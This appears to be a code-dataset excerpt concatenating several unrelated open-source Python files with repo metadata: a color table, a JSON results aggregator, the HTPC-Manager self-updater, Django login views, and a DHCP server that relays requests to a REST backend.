'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)}
|
rcucui/Pisa-util-fix
|
sx/pisa3/pisa_util.py
|
Python
|
apache-2.0
| 26,330 | 0.006077 |
#!/usr/bin/python
import sys, os, re
import json
import argparse
import pprint
arg_parser = argparse.ArgumentParser(description='Define tests')
arg_parser.add_argument('-p', '--pretty-print', action="store_true", help="select human friendly output, default is CSV")
arg_parser.add_argument('-i', '--info', action="store_true", help="show info about the data available in the specified directory")
arg_parser.add_argument('-k', '--show-keys', action="store_true", help="show available keys")
arg_parser.add_argument('-a', '--all-connections', action="store_true", help="extract results for all connections")
arg_parser.add_argument('-c', '--concurrent', default=0, help="filter results with specified concurrency", type=int)
arg_parser.add_argument('in_dir', help="Input directory containing JSON files")
arg_parser.add_argument('keys', nargs=argparse.REMAINDER, help="keys to extract")
args = arg_parser.parse_args()
def load_json(fname):
return json.load(open(fname, "r"))
def load_all(src_dir):
data = {}
file_list = os.listdir(src_dir)
for f in file_list:
if not os.path.splitext(f)[1] == ".json":
continue
fp = os.path.join(src_dir, f)
try:
data[f] = load_json(fp)
except ValueError:
print("Skipping corrupted file: %s" % f)
continue
return data
def dotkey(tree_root, dotted_key):
dotted_key = dotted_key.split(".")
value = tree_root
for key in dotted_key:
value = value[key]
return value
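# Example (key names hypothetical): dotkey({"conn_0": {"rtt": 1.5}}, "conn_0.rtt") -> 1.5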
def get_keys(f):
keys = []
t = data[f]
unvisited = list(t.keys())
while len(unvisited) > 0:
k = unvisited.pop()
child = dotkey(t, k)
if type(child) != dict:
keys.append(k)
else:
for kname in child.keys():
unvisited.append(k+"."+kname)
return keys
# unvisited += t[k]
# values = []
# k = key.split(".")
# for d in data:
# values.append(get_value(d, k))
# return values
def print_csv_header(columns):
out = "measurement"
for title in columns:
out += ", " + title
print(out)
def get_values_measurement(tree, keys):
out = []
for key in keys:
try:
out.append(dotkey(tree, key))
except KeyError:
out.append("N/A")
return out
def print_values(measure, values):
if args.pretty_print:
print("Measure: %s" % measure)
for v in values:
print("\t%s" % (v,))
else:
s = measure
for v in values:
s += "," + str(v)
print(s)
def expand_keys(template_measure):
"""For each key that contains conn_N will add all other conn_* keys with the
same suffix"""
new_keys = args.keys[:]
all_keys = get_keys(template_measure)
for ukey in args.keys:
match = re.search(r"conn_[0-9]+\.", ukey)
if match:
suffix = ukey[match.end():]
new_keys.remove(ukey)
for skey in all_keys:
if re.search(suffix+"$", skey):
new_keys.append(skey)
return new_keys
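# Illustrative expansion (key names hypothetical): a requested key such as
# "conn_0.throughput" is replaced by every "conn_N.throughput" key present in the data.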
def filter_measures(data, concurrent):
"""Return a filtered data dictionary containing only the selected concurrent number"""
measures = list(data.keys())
for measure in measures:
conc = get_values_measurement(data[measure], ["concurrent"])[0]
if conc != concurrent:
del data[measure]
return data
data = load_all(args.in_dir)
if args.info:
    # map each measurement file to its 'name' value (get_values_measurement is defined above)
    descrs = {f: get_values_measurement(data[f], ["name"]) for f in data}
print("These measurements are available:")
for d in sorted(descrs, key=lambda x: int(x.split("_")[0])):
print(d, ":", descrs[d][0])
sys.exit(0)
if args.show_keys:
f = sorted(data.keys())[-1]
print("Reading keys from file %s" % f)
ks = get_keys(f)
for k in sorted(ks):
print(k)
sys.exit(0)
if args.all_connections and args.concurrent == 0:
print("Error: -a requires -c")
sys.exit(1)
if args.concurrent != 0:
data = filter_measures(data, args.concurrent)
if args.all_connections:
new_keys = expand_keys(list(data.keys())[0])
else:
new_keys = args.keys[:]
if not args.pretty_print:
print_csv_header(new_keys)
for measure in data.keys():
values = get_values_measurement(data[measure], new_keys)
print_values(measure, values)
|
bigfootproject/OSMEF
|
data_processing/aggregate_old.py
|
Python
|
apache-2.0
| 4,348 | 0.00483 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Update HTPC Manager from Github. Either through git command or tarball.
Updater and SourceUpdater written by styxit
https://github.com/styxit
Git updater written by mbw2001
https://github.com/mbw2001
Used as reference:
- https://github.com/mrkipling/maraschino
- https://github.com/midgetspy/Sick-Beard/
"""
import os
from threading import Thread
import urllib2
import subprocess
import re
from json import loads
import cherrypy
import htpc
import logging
import tarfile
import shutil
import platform
from apscheduler.triggers.interval import IntervalTrigger
from htpc.root import do_restart
# configure git repo
gitUser = 'Hellowlol'
gitRepo = 'HTPC-Manager'
class Updater(object):
""" Main class """
def __init__(self):
self.logger = logging.getLogger('htpc.updater')
self.updateEngineName = 'Unknown'
# Set update engine. Use git updater or update from source.
self.updateEngine = self.getEngine()
# Check for updates automatically
htpc.SCHED.add_job(self.update_needed, trigger=IntervalTrigger(hours=6))
""" Determine the update method """
def getEngine(self):
self.logger.debug("Selecting Update engine.")
gitDir = os.path.normcase(os.path.join(htpc.RUNDIR, '.git'))
validGitDir = os.path.isdir(gitDir)
# If valid Git dir and git command succeeded, use Git updater
if validGitDir and self.test_git():
self.logger.info('Using GitUpdater engine')
self.updateEngineName = 'Git'
return GitUpdater()
        else:  # Otherwise update from Source
self.logger.info('Using SourceUpdater engine')
self.updateEngineName = 'Source'
return SourceUpdater()
def test_git(self):
self.logger.debug("Checking if git is installed")
gp = htpc.settings.get('git_path', 'git')
alternative_gp = []
        # osx people who start htpc-manager from launchd have a broken path, so try a hail-mary attempt for them
if platform.system().lower() == 'darwin':
alternative_gp.append('/usr/local/git/bin/git')
if platform.system().lower() == 'windows':
if gp != gp.lower():
alternative_gp.append(gp.lower())
        # Comment out the line below to test the source updater
# alternative_gp += ["%USERPROFILE%\AppData\Local\GitHub\PORTAB~1\bin\git.exe", "C:\Program Files (x86)\Git\bin\git.exe"]
        # Returns an empty string if it failed
output = GitUpdater().git_exec(gp, 'version')
if output:
# Found a working git path.
self.logger.debug("Found git path %s" % gp)
htpc.settings.set('git_path', gp)
return True
if alternative_gp and not output:
self.logger.debug("Checking for alternate git location")
for current_gp in alternative_gp:
self.logger.debug("Testing git path %s" % current_gp)
output = GitUpdater().git_exec(current_gp, 'version')
if output:
self.logger.debug("Found git path %s and it works!" % current_gp)
self.logger.debug("Saving git path %s to settings" % current_gp)
htpc.settings.set('git_path', current_gp)
return True
return False
@cherrypy.expose()
@cherrypy.tools.json_out()
def index(self, force=False):
""" Update on POST. Check for new updates on GET. """
        if cherrypy.request.method.upper() == 'POST':
            if force:
                self.check_update()
            Thread(target=self.updateEngine.update).start()
            return 1
        return self.check_update()
@cherrypy.expose()
@cherrypy.tools.json_out()
def updatenow(self):
Thread(target=self.updateEngine.update).start()
@cherrypy.expose()
@cherrypy.tools.json_out()
def status(self):
""" method to determine if HTPC Manager is currently updating """
return self.updateEngine.UPDATING
def check_update(self):
"""
Check for updates
Returns dict() with the following indexes:
UpdateNeeded True if an update is needed, False if an update is not needed OR not possible
latestVersion Commit hash of the most recent commit
currentVersion Commit hash for the version currently in use
versionsBehind How many versions is the current version behind the latest version
"""
output = {'updateNeeded': True, 'latestVersion': 'Unknown', 'currentVersion': 'Unknown', 'versionsBehind': 'Unknown'}
self.logger.info("Checking for updates from %s." % self.updateEngineName)
# Get current and latest version
# current can return True, False, Unknown, and SHA
current = self.updateEngine.current()
htpc.CURRENT_HASH = current
# Can return True, False
latest = self.updateEngine.latest()
htpc.LATEST_HASH = latest
self.logger.debug("Latest commit is %s" % latest)
self.logger.debug("Current commit is %s" % current)
if latest is False:
self.logger.error("Failed to determine the latest version for HTPC Manager.")
else:
output['latestVersion'] = latest
if current is False:
self.logger.error("Failed to determine the current version for HTPC Manager.")
else:
output['currentVersion'] = current
# If current or latest failed, updating is not possible
if current is False or latest is False:
self.logger.debug("Cancel update.")
output['updateNeeded'] = False
return output
# If HTPC Manager is up to date, updating is not needed
if current == latest and current != "Unknown":
self.logger.info("HTPC Manager is Up-To-Date.")
output['versionsBehind'] = 0
htpc.COMMITS_BEHIND = 0
output['updateNeeded'] = False
else:
behind = self.behind_by(current, latest)
htpc.COMMITS_BEHIND = behind
output['versionsBehind'] = behind
self.logger.info("Currently " + str(output['versionsBehind']) + " commits behind.")
return output
def behind_by(self, current, latest):
""" Check how many commits between current and latest """
self.logger.debug('Checking how far behind latest')
try:
url = 'https://api.github.com/repos/%s/%s/compare/%s...%s' % (gitUser, gitRepo, current, latest)
result = loads(urllib2.urlopen(url).read())
behind = int(result['total_commits'])
self.logger.debug('Behind: ' + str(behind))
return behind
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not determine how far behind')
return 'Unknown'
@cherrypy.expose()
@cherrypy.tools.json_out()
def branches(self):
return self.updateEngine.branches()
def update_needed(self):
self.logger.info("Running update_needed")
update_avail = self.check_update()
# returns true or false
if update_avail.get("updateNeeded"):
if htpc.settings.get('app_check_for_updates', False):
self.logger.debug("Add update footer")
# Used for the notification footer
htpc.UPDATE_AVAIL = True
else:
htpc.UPDATE_AVAIL = False
# Since im stupid, protect me please.. srsly its for myself.
if htpc.UPDATE_AVAIL and htpc.settings.get("app_auto_update", False) and not htpc.DEBUG:
self.logger.debug("Auto updating now!")
Thread(target=self.updateEngine.update).start()
class GitUpdater():
""" Class to update HTPC Manager using git commands. """
def __init__(self):
""" Set GitHub settings on load """
self.UPDATING = 0
self.git = htpc.settings.get('git_path', 'git')
self.logger = logging.getLogger('htpc.updater')
#self.update_remote_origin() # Disable this since it a fork for now.
def update_remote_origin(self):
self.git_exec(self.git, 'config remote.origin.url https://github.com/Hellowlol/HTPC-Manager.git')
def current_branch_name(self):
output = self.git_exec(self.git, 'rev-parse --abbrev-ref HEAD')
if output:
return output
else:
return htpc.settings.get('branch', 'master2')
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, self.current_branch_name())
result = loads(urllib2.urlopen(url).read())
latest = result['sha'].strip()
self.logger.debug('Branch: %s' % self.current_branch_name())
self.logger.debug('Latest sha: %s' % latest)
self.latestHash = latest
return latest
except Exception as e:
self.logger.error("Failed to get last commit from github")
return False
def current(self):
""" Get hash of current Git commit """
self.logger.debug('Getting current version.')
output = self.git_exec(self.git, 'rev-parse HEAD')
self.logger.debug('Current version: ' + output)
if not output:
            self.logger.error("Couldn't determine installed branch.")
return False
if re.match('^[a-z0-9]+$', output):
return output
def branches(self):
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
        if self.current() is not False:
d["verified"] = True
else:
# If its false, default to master branch
d["branch"] = htpc.settings.get('branch', 'master2')
branches = self.git_exec(self.git, 'ls-remote --heads https://github.com/Hellowlol/HTPC-Manager.git')
if branches:
# find all branches except the current branch.
d["branches"] = [b for b in re.findall('\S+\Wrefs/heads/(.*)', branches) if b != cbn]
return d
return [d]
def update(self):
""" Do update through git """
self.logger.info("Attempting update through Git.")
self.UPDATING = 1
if htpc.settings.get('branch', 'master2') == self.current_branch_name():
output = self.git_exec(self.git, 'pull origin %s' % htpc.settings.get('branch', 'master2'))
else:
output = self.git_exec(self.git, 'checkout -f ' + htpc.settings.get('branch', 'master2'))
if not output:
self.logger.error("Unable to update through git. Make sure that Git is located in your path and can be accessed by this application.")
elif 'Aborting.' in output:
self.logger.error("Update aborted.")
else:
if htpc.settings.get('git_cleanup') and not htpc.DEBUG:
self.logger.debug("Clean up after git")
self.git_exec(self.git, 'reset --hard')
# Note to self rtfm before you run git commands, just wiped the data dir...
# This command removes all untracked files and files and the files in .gitignore
# except from the content of htpc.DATADIR and VERSION.txt
self.git_exec(self.git, 'clean -d -fx -e %s -e VERSION.txt -e userdata/' % htpc.DATADIR)
self.logger.warning('Restarting HTPC Manager after update.')
# Restart HTPC Manager to make sure all new code is loaded
do_restart()
self.UPDATING = 0
def git_exec(self, gp, args):
""" Tool for running git program on system """
try:
proc = subprocess.Popen(gp + " " + args, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True, cwd=htpc.RUNDIR)
output, err = proc.communicate()
exitcode = proc.returncode
self.logger.debug("Running %s %s" % (gp, args))
except OSError, e:
self.logger.warning(str(e))
return ''
if exitcode > 0:
self.logger.warning('%s - %s' % (output, err))
return ''
if err:
self.logger.warning(output + ' - ' + err)
return ''
if any(s in output for s in ['not found', 'not recognized', 'fatal:']):
self.logger.warning(output)
return ''
if output and exitcode == 0:
return output.strip()
class SourceUpdater():
""" Class to update HTPC Manager using Source code from Github. Requires a full download on every update."""
def __init__(self):
self.UPDATING = 0
self.currentHash = False
self.verified = False
self.logger = logging.getLogger('htpc.updater')
self.versionFile = os.path.join(htpc.RUNDIR, 'VERSION.txt')
self.updateFile = os.path.join(htpc.DATADIR, 'htpc-manager-update.tar.gz')
self.updateDir = os.path.join(htpc.DATADIR, 'update-source')
def current(self):
""" Get hash of current runnig version """
self.logger.debug('Getting current version.')
# Check if version file exists
if not os.path.isfile(self.versionFile):
self.logger.warning('Version file does not exists. Creating it now.')
try:
versionFileHandler = open(self.versionFile, 'w')
versionFileHandler.close()
return 'Unknown'
except:
# If version file can not be created updating is also not possible
self.logger.error('Could not create version file.')
return False
""" Get version from version file """
fp = open(self.versionFile, 'r')
currentVersion = fp.read().strip(' \n\r')
fp.close()
self.logger.debug('Current version: ' + currentVersion)
if not currentVersion:
self.logger.error('No commit hash found in version file.')
return True
if re.match('^[a-z0-9]+$', currentVersion):
self.currentHash = currentVersion
return currentVersion
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, htpc.settings.get('branch', 'master2'))
result = loads(urllib2.urlopen(url).read())
latest = result['sha'].strip()
self.logger.debug('Latest version: ' + latest)
self.latestHash = latest
return latest
except:
return False
def current_branch_name(self):
""" Tries to find the current branches by reading version file
and matching that against all branches on github """
versionfile = self.current()
current_branch = htpc.settings.get('branch', 'master2')
#current_branch = htpc.settings.get('branch', 'Unknown')
# should return sha on success not True False
if not isinstance(self.current(), bool):
try:
url = "https://api.github.com/repos/%s/%s/branches?per_page=100" % (gitUser, gitRepo)
branches = loads(urllib2.urlopen(url).read())
for branch in branches:
if branch["commit"]["sha"] == versionfile:
current_branch = branch["name"]
self.verified = True
except:
self.logger.debug("Couldnt figure out what branch your using, using %s" % htpc.settings.get('branch', 'master2'))
return current_branch
def branches(self):
""" Returns the all the branches to gitUser and current branch """
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
if self.verified:
d["verified"] = True
try:
url = "https://api.github.com/repos/%s/%s/branches?per_page=100" % (gitUser, gitRepo)
branchlist = []
branches = loads(urllib2.urlopen(url).read())
for branch in branches:
branchlist.append(branch["name"])
d["branches"] = [b for b in branchlist if b != cbn]
return d
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not find any branches, setting default master2')
return [d]
""" Do update from source """
def update(self):
self.logger.info("Attempting update from source.")
self.UPDATING = 1
tarUrl = 'https://github.com/%s/%s/tarball/%s' % (gitUser, gitRepo, htpc.settings.get('branch', 'master2'))
# Download tar
downloaded = self.__downloadTar(tarUrl, self.updateFile)
if downloaded is False:
return False
# Extract to temp folder
extracted = self.__extractUpdate(self.updateFile, self.updateDir)
if extracted is False:
return False
        # Overwrite app source with source from extracted file
overwritten = self.__updateSourcecode()
if overwritten is False:
return False
# Write new version to file
# Just call it directly in case forced update.
self.__updateVersionFile(self.latest())
# Cleanup after yourself
self.__finishUpdate()
# Restart HTPC Manager to make sure all new code is loaded
self.logger.warning('Restarting HTPC Manager after update.')
do_restart()
def __downloadTar(self, url, destination):
""" Download source """
self.logger.info('Downloading update from %s' % url)
try:
self.logger.debug('Downloading update file to %s' % destination)
downloadedFile = urllib2.urlopen(url)
f = open(destination, 'wb')
f.write(downloadedFile.read())
f.close()
self.logger.info('Downloading update complete')
return True
except:
self.logger.warning('Failed to download update file')
self.__finishUpdate()
return False
def __extractUpdate(self, filePath, destinationFolder):
""" Extract files from downloaded tar file """
try:
self.logger.debug('Extracting tar file: %s' % filePath)
tarArchive = tarfile.open(filePath)
tarArchive.extractall(destinationFolder)
tarArchive.close()
return True
except:
self.logger.error('Failed extracting update file.')
self.__finishUpdate()
return False
""" Overwrite HTPC Manager sourcecode with (new) code from update path """
def __updateSourcecode(self):
# Find the extracted dir
sourceUpdateFolder = [x for x in os.listdir(self.updateDir) if
os.path.isdir(os.path.join(self.updateDir, x))]
        if len(sourceUpdateFolder) != 1:
            # There can only be one folder in sourceUpdateFolder
            self.logger.error("Invalid update data, update failed %s" % sourceUpdateFolder)
            return False
# Where to extract the update
targetFolder = os.path.join(htpc.RUNDIR)
# Full path to the extracted dir
contentdir = os.path.join(self.updateDir, sourceUpdateFolder[0])
self.logger.debug('Overwriting files.')
try:
# Loop files and folders and place them in the HTPC Manager path
for src_dir, dirs, files in os.walk(contentdir):
dst_dir = src_dir.replace(contentdir, targetFolder)
if not os.path.exists(dst_dir):
os.mkdir(dst_dir)
for file_ in files:
src_file = os.path.join(src_dir, file_)
dst_file = os.path.join(dst_dir, file_)
if os.path.exists(dst_file):
os.remove(dst_file)
shutil.move(src_file, dst_dir)
except:
self.logger.warning('Failed to overwrite old files')
self.__finishUpdate()
return False
        self.logger.info('Updated files successfully')
return True
def __updateVersionFile(self, newVersion):
"""
Write the latest commit hash to the version file.
Used when checking for update the next time.
"""
versionFileHandler = open(self.versionFile, 'wb')
versionFileHandler.write(newVersion)
versionFileHandler.close()
def __finishUpdate(self):
""" Remove leftover files after the update """
self.UPDATING = 0
if os.path.isfile(self.updateFile):
self.logger.debug('Removing update archive')
try:
os.remove(self.updateFile)
except:
pass
if os.path.isdir(self.updateDir):
self.logger.debug('Removing update code folder')
try:
shutil.rmtree(self.updateDir)
except:
pass
|
Dahlgren/HTPC-Manager
|
htpc/updater.py
|
Python
|
mit
| 21,554 | 0.002366 |
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.forms import AuthenticationForm
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.debug import sensitive_post_parameters
from django.views import generic
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
class LoginView(generic.FormView):
success_url = settings.LOGIN_REDIRECT_URL
form_class = AuthenticationForm
redirect_param = getattr(settings, 'REDIRECT_FIELD_NAME', 'next')
template_name = 'accounts/login.html'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth.login(self.request, form.get_user())
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
def form_invalid(self, form):
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
redirect_to = self.request.GET.get(self.redirect_param)
if not is_safe_url(url=redirect_to, host=self.request.get_host()):
redirect_to = self.success_url
return redirect_to
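    # Example: a request to /login/?next=https://evil.example is rejected by
    # is_safe_url above and falls back to settings.LOGIN_REDIRECT_URL.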
class LogoutView(generic.RedirectView):
permanent = False
pattern_name = 'main:landing'
def get(self, request, *args, **kwargs):
auth.logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
class ProfileView(generic.TemplateView):
template_name = 'accounts/profile_detail.html'
|
neuroticnerd/django-demo-app
|
django_demo/accounts/views.py
|
Python
|
mit
| 1,886 | 0 |
#!/usr/bin/python2
# -*- encoding: utf-8 -*-
#pylint: disable=W0105
import argparse
import logging
import configparser
import requests
from libpydhcpserver.dhcp import DHCPServer
class PBAADHCPServer(DHCPServer):
def __init__(
self, server_address, server_port, client_port, aaserver_addr,
proxy_port=None, response_interface=None,
response_interface_qtags=None
):
self._aaserver_addr = aaserver_addr
DHCPServer.__init__(
self,
server_address=server_address,
server_port=server_port,
client_port=client_port,
proxy_port=proxy_port,
response_interface=response_interface,
response_interface_qtags=response_interface_qtags
)
def _handleDHCPDecline(self, packet, source_address, port):
"""Processes a DECLINE packet.
Override from DHCPServer.
Send the packet's info to the AA server.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPDECLINE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_DECLINE', self._get_packet_info(packet))
def _handleDHCPDiscover(self, packet, source_address, port):
"""Processes a DISCOVER packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPDISCOVER from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_DISCOVER', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def _handleDHCPInform(self, packet, source_address, port):
"""Processes a INFORM packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPINFORM from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_INFORM', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def _handleDHCPLeaseQuery(self, packet, source_address, port):
"""Processes a LEASEQUERY packet.
Override from DHCPServer.
Ignore the packet.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPLEASEQUERY from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
def _handleDHCPRelease(self, packet, source_address, port):
"""Processes a RELEASE packet.
Override from DHCPServer.
Send the packet's info to the AA server.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPRELEASE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_RELEASE', self._get_packet_info(packet))
def _handleDHCPRequest(self, packet, source_address, port):
"""Processes a REQUEST packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
        logging.info('received DHCPREQUEST from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_REQUEST', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def get_next_dhcp_packet(self, timeout=60, packet_buffer=2048):
"""Make the _getNextDHCPPacket method public."""
return self._getNextDHCPPacket(timeout, packet_buffer)
def _send_dhcp_msg(
self, packet, msg_type, options, source_address, port
):
"""Send the DHCP packet to the client.
Set the options of the DHCP packet, and send it to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to send to the client.
msg_type (str):
The message type of the DHCP packet.
options (dict):
The options of the DHCP packet.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
if msg_type is None:
            logging.warning('Ignoring packet: message type is None.')
return
for option, value in options.items():
packet.setOption(option, value)
# packet.setOption('server_identifier', self._server_address)
if msg_type == 'DHCP_OFFER':
packet.transformToDHCPOfferPacket()
elif msg_type == 'DHCP_ACK':
packet.transformToDHCPAckPacket()
elif msg_type == 'DHCP_NAK':
packet.transformToDHCPNakPacket()
else:
logging.warning('Incorrect message type: %s.', msg_type)
logging.warning('Packet will be ignored.')
return
logging.info('send %s to %s:%s',
msg_type, source_address.ip, port)
logging.debug('\n%s\n', packet)
self._sendDHCPPacket(packet, source_address, port)
@staticmethod
def _get_packet_info(packet):
"""Return a dict of the infomation of the DHCP packet.
Fetch the information from the DHCP packet, and return them
in dict type.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
Returns:
dict: The information of the packet.
"""
info = {}
# fetch the information from these fields
for field_name in [
'op', 'htype', 'hlen', 'hops', 'xid', 'secs', 'flags',
'ciaddr', 'yiaddr', 'siaddr', 'giaddr', 'chaddr',
'sname', 'file'
]:
info[field_name] = packet.getOption(field_name)
# fetch the information from the "option" field
options = {}
packet.setSelectedOptions()
for option in packet.getSelectedOptions():
options[option] = packet.getOption(option)
info['options'] = options
return info
def _get_client_optionsT(self, dhcp_type, client_info): #pylint: disable=I,W,C
'''Get the fixed options of the client.
This method is for debugging.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
        res_msg_type (str): The message type that should be sent to the client.
        res_data (list): The options that should be sent to the client (if needed).
'''
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
require_options = True
elif dhcp_type == 'DHCP_INFORM':
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# requireOptions = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
res_msg_type = None
res_data = None
if require_options:
try:
res_msg_type = self._code_to_msg_type[dhcp_type][200]
except KeyError:
                logging.error('Status code from server is not correct.')
logging.error('Packet will be ignored.')
if res_msg_type is not None:
try:
res_data = {
'subnet_mask': '255.255.255.0',
'router': '192.168.1.1',
'domain_name_servers': '8.8.8.8',
'ip_address_lease_time': 3600,
'server_identifier': '127.0.0.1',
'yiaddr': '192.168.1.100'
}
except ValueError:
logging.error('Data sent from server is not correct.')
return [res_msg_type, res_data]
def _get_client_options(self, dhcp_type, client_info):
'''Get the options of the client from a RESTful server.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
        res_msg_type (str): The message type that should be sent to the client.
        res_data (list): The options that should be sent to the client (if needed).
'''
# Send the information of the packet received from the client
# to the AA server, and get the response.
res = None
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
logging.debug('Url: %s', self._aaserver_addr)
res = requests.post(self._aaserver_addr + '/discover',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
res = requests.post(self._aaserver_addr + '/request',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_INFORM':
res = requests.post(self._aaserver_addr + '/inform',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
res = requests.put(self._aaserver_addr + '/decline',
json=client_info)
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
res = requests.put(self._aaserver_addr + '/release',
json=client_info)
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# res = requests.post(self._aaserver_addr + '/leasequery',
# json=client_info)
# require_options = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
# According to the status_code received from the AA server,
# decide the message type to send to the client.
res_msg_type = None
res_data = None
if require_options:
res_msg_type = self._code_to_msg_type[dhcp_type].get(res.status_code)
if res_msg_type is not None:
"""Whether the data need to be sent to the client."""
try:
res_data = res.json()
except ValueError:
logging.error(
'Incorrect data format sent from server: %s', res.text)
return [res_msg_type, res_data]
_code_to_msg_type = {
'DHCP_DISCOVER': {200: 'DHCP_OFFER'},
'DHCP_REQUEST': {200: 'DHCP_ACK', 403: 'DHCP_NAK'},
'DHCP_INFORM': {200: 'DHCP_ACK'}
}
"""The status_code-meassage_type table."""
def main():
argparser = argparse.ArgumentParser()
argparser.add_argument("-f", dest="config_file", default='config.ini',
